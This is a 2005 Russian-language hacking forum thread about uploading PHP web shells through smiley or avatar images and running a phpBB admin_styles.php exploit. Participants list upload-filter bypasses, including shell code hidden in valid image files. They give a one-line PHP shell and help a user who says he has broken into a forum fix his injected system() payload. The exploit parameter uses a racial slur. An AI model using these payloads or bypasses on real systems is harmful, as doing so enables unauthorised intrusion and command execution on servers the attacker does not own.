php

DSR_ Guest	#1 Это нравится:0 Да/0 Нет 08.04.2005 23:51:36 Слышал,что через смайлы можно залить шелл, мож кто знает как?

^rage^ Guest	#2 Это нравится:0 Да/0 Нет 09.04.2005 15:06:54 вы сами смысл вопроса понимаете?

rav3n Guest	#3 Это нравится:0 Да/0 Нет 09.04.2005 15:17:23 До чего народ докатился уже php от phpBB не отличают

DSR_ Guest	#4 Это нравится:0 Да/0 Нет 09.04.2005 16:16:39 почему же не отличают?с чего вы это взяли...смысл вопроса я понимаю,и тот кто знает тот поможет,ну или нет...

Phoenix

Guest

Это нравится:0 Да/0 Нет

09.04.2005 16:30:24

объясни еще раз, чего ты хочешь? как варианты:
1) если скрипт, закачивающий смайлы (изображения по сути) не проверяет расширение изобращения, то никто не мешает подсунуть этому скрипту обычный PHP SHELL <? system($smd) ?> с расширением *.php.
2) кроме того, не исключено, что даже если эта проверка и существует, ее можно обойти некоторым образом
3) если принятый файл (пусть с расширением *.jpg) не проверяется на правльную картинку, но имя его фильтруется, то никто не запрещает залить обычный PHP SHELL, дав ему имя картинки (test.jpg). это рашит проблемму щзаливки шелла на сервер, но не решит проблемму запуска шелла

4) тоже самое, но файл явно переименовывается в файл изображения.
5) если проверка на корректность изображения проводится, то, как показала практика, реально создать правильный файл картинки (gif, jpg), одновременно содержаший в себе строку PHP SHELL-а. Далее см пуенк 3
6) тоже самое, но файл явно переименовывается в файл изображения.
7) ... возможны еще варианты, то что выше - всего лишь то, что первое пришло на ум...
========
PS. учиытвая что я не понял что ты спрашиваешь, я сомневаюсь что ты поймешь то, что я ответил...

^rage^

Guest

Это нравится:0 Да/0 Нет

09.04.2005 18:14:13

эмм...
1)имхо, смайлы добавлять может только администратор форума.
2)не факт что файлы с расширением, отличным от php будут обрабатываться интерпретатором.
3)та же фигня но с аватарами и даже если заливать kewl.php не поможет, т.к. упадёт картинка в /images/, инклудить из которого скорее всего запрещено.
4)сама мысль инклудить из картинок наивна, т.к. вероятность что до этого кто-то не додумался раньше крайне мала.

DSR_

Guest

Это нравится:0 Да/0 Нет

09.04.2005 19:15:16

Цитата
^rage^ пишет: эмм... 1)имхо, смайлы добавлять может только администратор форума.

я и есть админ...

я гдето читал,что если немного подкоректировать бд,то можно залить шелл на ...

Phoenix

Guest

Это нравится:0 Да/0 Нет

09.04.2005 19:26:16

2 DSR_
слушай, тут все пытяются что либо понять из того что ты даже не пытаешься объяснить...
Я ПОВТОРЯЮ.
опиши поподробнее прлблему. ГДЕ, В КАКОМ ФОРУМК ИЛИ СИСТЕМЕ, ТЫ ГОВОРИШЬ ПРО КАКУЮТО ИЗВЕСТНУЮ УЯЗВИМОСТЬ ИЛИ ПРО ЧТО ТЫ ТУТ ВОБЩЕ ГОВОРИШЬ, КАКУЮ БД, ГДЕ И ПРО ЧТО ЧИТАЛ
так как все телепаты оычно уходят в апреля в отпуск, врядои кто то тут сможет тебе помочь...

Phoenix Guest	#9 Это нравится:0 Да/0 Нет 09.04.2005 19:28:53 а вообще, бери тот который обчно, задем того его, только наоборот, но не так как внутри а вместо него. после этого его это, получишь штучку такую которую надо немного туда.

DSR_

Guest

#10

Это нравится:0 Да/0 Нет

10.04.2005 00:38:52

не много поменяем вопрос...

вот допустип поломал я форум phpbb,можа как нибуть туда шелл залить,вот последний сплоит под phpbb вроде даёт шелл,но вот я врубаю неткат,пускаю сплоит,подключений ко мен ни каких...
и чё то вот не пойму,если выходит пхп инфо почему другие команды не выполняються:

http://www.fuck.ru/forum/admin/admin_styles.php?mode=addnew& install_to=../.
./../../../../../../../../../../../../../../../../../tmp&nig ga=phpinfo();&sid=***

вот подставим так:

../tmp&nigga=system($cmd);&cmd=ls -la&sid=***

выдаёт ошибки,почему?

rav3n Guest	#11 Это нравится:0 Да/0 Нет 10.04.2005 08:45:47 ../tmp&nigga=system("ls -al");&sid=***

DSR_ Guest	#12 Это нравится:0 Да/0 Нет 10.04.2005 13:12:46 от души rav3n...!!!

Логин:
Пароль:
	Запомнить меня на этом компьютере

Забыли свой пароль?